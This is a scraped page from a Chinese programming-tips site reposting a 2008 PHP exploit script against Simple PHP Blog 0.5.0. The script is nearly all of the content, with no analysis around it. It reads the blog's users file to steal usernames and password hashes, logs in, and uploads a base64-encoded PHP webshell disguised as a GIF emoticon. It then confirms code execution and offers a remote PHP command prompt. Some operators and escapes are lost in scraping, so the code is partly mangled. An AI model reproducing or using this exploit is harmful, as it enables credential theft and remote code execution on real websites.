欢迎来到福编程网,本站提供各种互联网专业知识!
手机版
微信关注
快捷导航
正则表达式 AJAX相关 黑客相关 相关技巧 Mysql MsSql MsSql2005 MsSql2008 MariaDB Oracle Access SQLite PostgreSQL MongoDB DB2 Redis 数据库文摘 数据库其它 LINUX RedHat/Centos Ubuntu/Debian Fedora Solaris 红旗Linux Unix/BSD 苹果MAC 麒麟系统 注册表 BIOS 系统安装 系统进程 Fireworks教程
您的位置:网站首页 > 无法确定分类

Simple PHP Blog (SPHPBlog)

发布时间:1970-01-01 作者:佚名 来源:互联网
标签: 雪佛兰 通用 奢华 劳斯莱斯 旗舰版 64位 收藏夹 解调器
<?/*sIMPLEphpbLOG0.5.0eXPLOITbYmAXzA2008*/functioncurl($url,$postvar){global$cook;$ch=curl_init($url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,1);

/*

sIMPLE php bLOG 0.5.0 eXPLOIT

bY mAXzA 2008

*/

function curl($url,$postvar){

global $cook;

$ch = curl_init( $url );

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_HEADER, 1);

curl_setopt ($ch, CURLOPT_REFERER,"$url");

if (strlen($postvar)<3) $postvar="123";

curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);

if (strlen($cook)>3)

curl_setopt ($ch, CURLOPT_COOKIE, "$cook");

$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "

$err
";

curl_close($ch);

return $res;

} function error($msg){

print "

$msg
n

Not Exploitable";exit;

} extract($_POST);extract($_GET); print "

URL:
";


if (strlen($eval)>3){


   $eval=stripslashes($eval);


   print "nEnter PHP Command:n";


   print "
";


   $res=curl("$url/images/emoticons/sphp.php","z=$eval");


   $res=strstr($res,"GIF89a");


   print substr($res,41);exit;


}

if (strlen($url)>10)


{


  print "n
Trying to Get /config/users.php...";flush();


  $res=curl($url."/config/users.php","");


  if (strstr($res,'|')) print "Done!nn$res";


  else error("nnUsername & Password Not Foundnn$res");

  print "n
Trying to Get Username & Password...";flush();


  $res=str_replace("rn","n",$res);


  $res=substr($res,strpos($res,"nn") 2);


  $line=explode("n",$res);$n=count($line)-1;


  if ($n) {


  print "nDone! Found - $n users:n";


   for ($x=0;$x<$n;$x  ){


     $up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);


     print "nUsername - ".$up[1]."tPassword - ".$up[2];


   }


  }

  print "n
Trying to Login...";flush();


  $postvar="user=$user[0]&pass=$pass[0]&";


  $res=curl($url."/login_cgi.php","$postvar");


  $cook=strstr($res,'Set-Cookie: sid=');


  $cook=substr($cook,12,strpos($cook,';')-12);


  if ($cook) print "nnDone...  Cookie - $cook";else error("n
Error To Login
nnn$res");

  print "n
Trying to Upload Emoticon...";flush();


  $buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8 Ow==";


  if (@filesize('sphp.php')!=82){


       $f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);


  }


  $f=getcwd()."/sphp.php";


  $res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));


  if (strstr($res,"Success!")) print "nnDone! Exploit path - $url/images/emoticons/sphp.php"; else error("n
Error To Upload
nnn$res");

  print "n
Trying to Exploit...";flush();


  $res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");


  if (strstr($res,"20080824")) print "nnDone! Exploit Working!"; else error("n
Error To Exploit
nnn$res");

  print "n
Trying to Logout...";flush();


  $res=curl($url."/logout.php","");


  if (strstr($res,"You are now logged out")) print "nnDone!"; else error("n
Error To Logout
nnn$res");


  print "nEnter PHP Command:n";


}


print "";


?>

相关推荐

文章分类

免责声明 联系我们 关于我们 广告合作 电脑相关 手机学院 网络编程 数据库 操作系统 平面设计 网站运营 网络安全

热门关键词

雪佛兰 通用 奢华 劳斯莱斯 旗舰版 64位 收藏夹 解调器 网卡 网线 分辨率 家电 4k 显示器 header USER_AGENT 色彩 图形 商业 生成

热门文章

最新更新

网站首页  | 关于我们  | 免责声明  | 广告合作  | 联系我们
Copyright @ 2015-2024 福编程 fuphp All Rights Reserved.
豫ICP备15036959号-4